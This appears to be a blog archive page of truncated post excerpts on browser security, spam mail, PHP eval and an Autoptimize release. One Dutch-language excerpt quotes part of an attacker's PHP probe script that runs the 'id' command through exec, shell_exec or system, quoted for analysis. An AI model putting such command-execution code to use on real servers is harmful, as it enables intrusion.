Browser enforced web application security; IE8 safest?

With a notoriously bad reputation for security (or the lack thereof) in Internet Explorer, Microsoft claims to have invested a lot in IE8 security in general and specifically in browser enforced website security. Indeed, according to the product site, IE8: […] helps protect you from today’s threats, including malware and phishing, as well as emerging […]

Firefox3 honouring MSIE security zones, downloads blocked

A few weeks ago my wife complained she couldn’t install software on her WindowsXP-laptop any more. When doubleclicking the downloaded application, she got the errormessage “This is not a valid win32 application”. Earlier today I had the same problem when trying to install Putty, so I tried downloading the file again and noticed the following […]

WebApp Security is mandatory (even for spammy virals)

I just received a mail from Frank Goossens. I’ve apparently invited myself to view “an adorable Christmas-card” containing “warm wishes”. Moreover I tried to guilt-trick myself into forwarding that same card to friends and family, as that simple gesture would provide the poor with (unhealthy fried) food for the Poverello Christmas-dinner. In general I don’t […]

PHP security: Eval is evil?

Naar aanleiding van mijn vorige post een beetje naar de tooltjes zitten kijken die de script kiddies op mijn serverken loslaten. Een voorbeeldje: <?php echo “549821347819481<br>”; $cmd=”id”; $eseguicmd=ex($cmd); echo $eseguicmd.”<br>”; function ex($cfe){ $res = ”; if (!empty($cfe)){ if(function_exists(‘exec’)){ @exec($cfe,$res); $res = join(“\n”,$res); } elseif(function_exists(‘shell_exec’)){ $res = @shell_exec($cfe); } elseif(function_exists(‘system’)){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); […]

Introducing zytzagoo’s major changes for Autoptimize 2.4

[UPDATE 29/03/2018: Autoptimize 2.4 can now be downloaded from and will automatically update so ensure all new functionality and fixes are applied] TL;DR Autoptimize 2.4 will be a major change. Toma┼í Trkulja (aka zytzagoo) has cleaned up and modernized the code significantly, making it easier to read and maintain, switched to the latest and […]